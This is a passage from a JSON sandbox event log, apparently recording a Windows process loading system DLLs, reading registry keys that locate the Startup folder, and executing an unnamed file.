132, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 133, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 134, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 135, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 136, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 137, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 138, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 139, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 140, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 141, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 142, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 143, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x75c40000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 144, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x75c40000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 145, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 146, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 147, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 148, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 149, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 150, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 151, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 152, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 153, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 154, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 155, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 156, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 157, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 158, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 159, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 160, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 161, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 162, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 163, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 164, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 165, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 166, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 167, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 168, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 169, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 170, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 171, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 172, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 173, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 174, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 175, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 176, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 177, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 178, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 179, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 180, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 181, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 182, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 183, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 184, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 185, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 186, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 187, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 188, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 189, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 190, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 191, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 192, "data": { "file": "psapi.dll", "pathtofile": null, "moduleaddress": "0x76280000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 193, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 194, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 195, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Category", "content": "4" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 196, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Name", "content": "Startup" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 197, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\ParentFolder", "content": "{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 198, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Description", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 199, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\RelativePath", "content": "StartUp" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 200, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\ParsingName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 201, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\InfoTip", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 202, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\LocalizedName", "content": "@%SystemRoot%\\system32\\shell32.dll,-21787" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 203, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Icon", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 204, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Security", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 205, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\StreamResource", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 206, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\StreamResourceType", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 207, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\LocalRedirectOnly", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 208, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Roamable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 209, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\PreCreate", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 210, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Stream", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 211, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\PublishExpandedPath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 212, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\DefinitionFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 213, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Attributes", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 214, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\FolderTypeID", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 215, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\InitFolderHandler", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 216, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,722", "eid": 217, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup", "content": "%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,925", "eid": 218, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": "0x77150000" } }, { "event": "execute", "object": "file", "timestamp": "2025-03-02 21:32:28,925", "eid": 219, "data": { "file": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 220, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 221, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 222, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 223, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 224, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 225, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 226, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 227, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 228, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 229, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 230, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 231, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 232, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 233, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 234, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 235, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 236, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 237, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x75c40000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 238, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x75c40000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 239, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 240, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 241, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 242, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 243, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 244, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 245, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 246, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 247, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 248, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 249, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 250, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 251, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 252, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 253, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 254, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 255, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 256, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 257, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 258, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 259, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 260, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 261, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 262, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 263, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 264, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 265, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 266, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 267, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 268, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 269, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 270, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 271, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 272, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 273, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 274, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 275, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 276, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 277, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 278, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 279, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 280, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 281, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 282, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 283, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 284, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 285, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 286, "data": { "file": "psapi.dll", "pathtofile": null, "moduleaddress": "0x76280000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 287, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 288, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 289, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,909", "eid": 290, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,925", "eid": 291, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, 